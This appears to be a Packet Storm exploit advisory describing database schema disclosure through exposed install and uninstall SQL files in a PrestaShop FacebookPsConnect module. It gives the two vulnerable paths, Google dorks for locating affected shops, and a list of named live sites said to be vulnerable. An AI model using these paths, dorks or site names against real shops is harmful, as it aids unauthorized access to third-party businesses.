PrestaShop FacebookPsConnect modules version 1.6.1.4 suffer from a database disclosure vulnerability.
9d8bcfd734af7767338462be61e39af99380285da6603c60078a00e388d6c6a4#################################################################################################
# Exploit Title : PrestaShop FacebookPsConnect Modules 1.6.1.4 Database
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com ~ businesstech.fr
# Software Download Link : modulebazaar.com/prestashop-facebook-connect.html
+ sourceforge.net/projects/prestashopfacebookconnect/
# Software Installation Price : 50$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0A+- ~ 1.5.4.0 ~ 1.5.5.0 ~ 1.5.6.1 ~ 1.5.6.2
~ 1.6.1.4 ~ 1.6.0.9
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/facebookpsconnect/sql/''
intext:''FiA"rement rA(c)alisA(c) par Mezcalito''
intext:''Copyright 2018 / PrestaShop. Implented by DGWStudios.com & Design
by LeoTheme''
intext:''Copyrights 2012 rygeshop.dk Alle rettigheder forbeholdes''
intext:''A(c) 2018 Powered by Billiandi Creations LtdaC/''
intext:''A(c) 2013 - Vinta Quatre. Tous droits rA(c)servA(c)s - CrA(c)ation Yellow
Agence Internet''
intext:''A(c) 2013 oscadi.comaC/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
* PrestaShop FacebookPsConnect Modules Install Uninstall Script Database
Disclosure
#################################################################################################
# Exploit :
/modules/facebookpsconnect/sql/install.sql
/modules/facebookpsconnect/sql/uninstall.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] fcgshop.com/modules/facebookpsconnect/sql/install.sql
[+] vinta-quatre.com/modules/facebookpsconnect/sql/install.sql
[+] poemana.com/catalogue/modules/facebookpsconnect/sql/install.sql
[+] lecoindespetits.com/modules/facebookpsconnect/sql/install.sql
[+] dimayori.com.gt/modules/facebookpsconnect/sql/install.sql
[+] shakarababe.com/modules/facebookpsconnect/sql/
[+] neurodigital.es/store/modules/facebookpsconnect/sql/install.sql
[+] rygeshop.dk/modules/facebookpsconnect/sql/install.sql
[+]
ultimateparisguide.com/registration/modules/facebookpsconnect/sql/install.sql
[+] dietanat.com/modules/facebookpsconnect/sql/install.sql
[+] margauxlonnberg.com/shop/modules/facebookpsconnect/sql/install.sql
#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team
#################################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed